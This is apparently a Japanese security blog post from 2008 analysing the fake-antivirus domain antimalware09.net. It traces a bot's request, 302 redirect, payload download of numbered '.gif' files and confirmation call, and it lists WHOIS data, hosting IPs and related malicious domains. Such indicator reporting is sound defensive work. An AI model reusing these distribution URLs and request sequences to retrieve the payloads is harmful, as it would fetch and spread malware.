antimalware09.net
Published: 2008/10/22
数あるFakeアンチウィルスなんですが、人を騙すわけではなくボットが自発的にアクセスに行ってました。
直接みるとこんなページです。
ボットの動きはこんな感じ。
①まず、こんなリクエストを飛ばします。
http://antimalware09.net/images/xxxxxxx/xxxxxxxx/xxxx2-xxx-xxx-bc8d-xxxxxde.gif
②すると、こんな302応答が返ってきて別のURLへ飛ばされます。
HTTP/1.1 302 Found..Server: nginx/0.6.26..Date: Tue, 21 Oct 2008 15:15:42 G MT..Content-Type: text/html; charset=UTF-8..Connection: close..X-Powered-By : PHP/5.1.6..Location: http://stat.antimalware09.net/soft3/common/17.gif..C ontent-Length: 0....
③で、ダウンロード
GET /soft3/common/17.gif HTTP/1.0..Range: bytes=0-..User-Agent: Internet Ex plorer..Host: stat.antimalware09.net....
④その後、確認行為が行われます。
GET /images/XXXXX/xxxxx657xxxxxxx/xxxx2-xxx-xxx- bc8d-xxxxxde.ok?id=17 HTTP/1.0..Range: bytes=0-..User-Agent: Internet Explorer..Host: antimalware09.net....
⑤この確認行為に対する応答の中身は
OK
ダウンロードされるファイルには何種類かあるようですが、その選択ルールは不明です。この例では「17.gif」。
ちなみに最後の⑤の確認行為が行われると、①のURLは使用できなくなるようです。それ以後404応答。
ただし①の文字列を適当にいじってやると新たなURLとして有効になります。当然同じように対応する⑤のリクエストを送ると使えなくなります。
まぁ、そんなことしなくても③のURLは直接叩けるので根こそぎさらってみました。
5~9.gif、10~12.gif、14~17.gif、23~28.gifの18ファイルが存在していてそのタイムスタンプはすべて2008/10/22 6:48でした。
ハッシュ値はすべてばらばらですが、全部こんな感じです。
各種ブラックリストには、ちゃんと登録されているようですが、アンチウィルス対応ができてませんね。たぶんマルウェア自体が更新されているせいだと思いますが。
ドメインは中国で取得、即利用開始という最近よく見るパターン
Domain Name: ANTIMALWARE09.NET Registrar: BIZCN.COM, INC. Whois Server: whois.bizcn.com Referral URL: http://www.bizcn.com Name Server: NS1.ANTIMALWARE09.NET Name Server: NS14.ANTIMALWARE09.NET Name Server: NS3.ANTIMALWARE09.NET Status: clientDeleteProhibited Status: clientTransferProhibited Updated Date: 02-oct-2008 Creation Date: 02-oct-2008 Expiration Date: 02-oct-2009
利用されているアドレスは3つ。
218.106.90.227
中国(AS9929)
inetnum: 218.106.90.128 - 218.106.90.255 netname: hefei-qingyi-jiayuan-corp country: cn descr: hefei city admin-c: TC254-AP tech-c: TC254-AP status: ASSIGNED NON-PORTABLE source: APNIC route: 218.104.0.0/14 descr: CNC Group CncNet country: CN origin: AS9929
58.65.237.49
香港(AS23898)
inetnum: 58.65.232.0 - 58.65.239.255 netname: HOSTFRESH descr: HostFresh descr: Internet Service Provider country: HK admin-c: PL466-AP tech-c: PL466-AP status: ALLOCATED PORTABLE mnt-by: APNIC-HM
77.244.220.134
ロシア(AS35357)
inetnum: 77.244.220.0 - 77.244.220.255 netname: PRIMENET1 descr: Allocation for our customer PrimeNet country: RU admin-c: RZT1-RIPE tech-c: RZT1-RIPE status: ASSIGNED PA mnt-by: RZT-MNT
これらのIPアドレスはこんなドメインでも使用されています。
a-vxp2008.com anti-virusxp2008.net antimalware09.com encountertracker.ws mail.a-vxp2008.com mail.anti-virusxp2008.net mail.antimalware09.com mail.antimalware09.net mail.encountertracker.ws mail.youpornzztube.com
by jyake